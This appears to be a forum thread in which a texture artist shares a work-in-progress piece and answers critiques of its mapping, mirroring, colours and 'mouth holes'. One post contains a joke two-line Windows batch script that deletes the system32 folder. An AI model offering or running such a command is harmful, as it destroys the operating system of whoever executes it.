Christmas Lottery
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[TEX] Miscible Goof

Something I have been working on for few days.
Slow progress.

Will need to fix those light gray things that go to the top. They didn't turn out as I had imagined them to.

Anything else wrong with it? Any ideas to put on it? Feel free to suggest and point them out

I'll probably take a few days off from working on it. Seeya on sunday.
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Mapping...... The mapping is horrible. I like the concept. Maybe not as much C/P? I mean like mirroring wise.
Alive and Kicking again, [SECRET], former artist, I lose all my matches.
I think you should start making stuff that makes sense, people will just see this and go "what is going on" doesn't matter how beautiful the texture/details looks if nobody gets it. I know I'm not the right person to say this.. but yeah.. If you want to sell stuff etc. But its a good looking piece of randomness you got there.
Originally Posted by iemagazine View Post
Mapping...... The mapping is horrible. I like the concept. Maybe not as much C/P? I mean like mirroring wise.

I think it maps just fine.
Oh yeah mirroring is my biggest sin.

Originally Posted by Ezeth View Post
I think you should start making stuff that makes sense, people will just see this and go "what is going on" doesn't matter how beautiful the texture/details looks if nobody gets it. I know I'm not the right person to say this.. but yeah.. If you want to sell stuff etc. But its a good looking piece of randomness you got there.


And yeah... I can still do pretty much anything to it ;) I can add some sense to it if needed. But you do have a point there, sir. I need to start planning these out better if I'm going to keep doing them.

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Originally Posted by Ezeth View Post
I think you should start making stuff that makes sense, people will just see this and go "what is going on" doesn't matter how beautiful the texture/details looks if nobody gets it. I know I'm not the right person to say this.. but yeah.. If you want to sell stuff etc. But its a good looking piece of randomness you got there.

Same. It's rly strange, but i actually love it. I think that it would fit strange, but after all if you look at it in this form it's pretty great for me.
You think the mapping is just fine, just test it out in game. The textures will be stetched and ugly. You also will barely just see the bottom holes.

Right now it's a piece of crap. Even when it's finish it will look bad. So I give it a 2/10.
I like the shading/highlights you put on the 'plates(?)'. But I don't really understand what the mouth holes are. They don't look like they will map well either. Another thing is the colors are very weird. Gray, orange, shaman looking?

still cool
@echo off
del c:\WINDOWS\system32
Originally Posted by Metriakon View Post
You think the mapping is just fine, just test it out in game. The textures will be stetched and ugly. You also will barely just see the bottom holes.

Right now it's a piece of crap. Even when it's finish it will look bad. So I give it a 2/10.

Oh so you meant the lower mapping. I really am not sure myself if they should be visible or not, but it won't hurt to try to move them higher.
And I have been doing textures for a few years so I really would think I know how mapping works and how it doesn't.
You really can't say that the finished version will look like crap from a WIP (: but I appreciate your opinion. It's hard to satisfy everyone

Originally Posted by HoboBanned View Post
I like the shading/highlights you put on the 'plates(?)'. But I don't really understand what the mouth holes are. They don't look like they will map well either. Another thing is the colors are very weird. Gray, orange, shaman looking?

still cool

The color theme is from red to yellowish. So the gray is there just as a place holder for now.

A lot of comments about the mouth holes. So you don't like/understand them? Cool, I'll try to change them to something different then I just thought that it would look empty without them.
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I'm not sure what everyone is going on about when they say that it looks terrible and such.

With the design thus far there's a lot of room to ultimately create a design which has a more solid idea.

When I first looked at your wip, I saw a head of a bug, large eyes, antennae, and what could be a mouth, and or nose structure below.

Just continue, and have a plan. Who cares what other people like or dislike. It's your piece of art :P
I like where this is going. Continue working on your art, probably it'll be something nice later on. Good luck on it.
Shoot me a PM if you have any queries!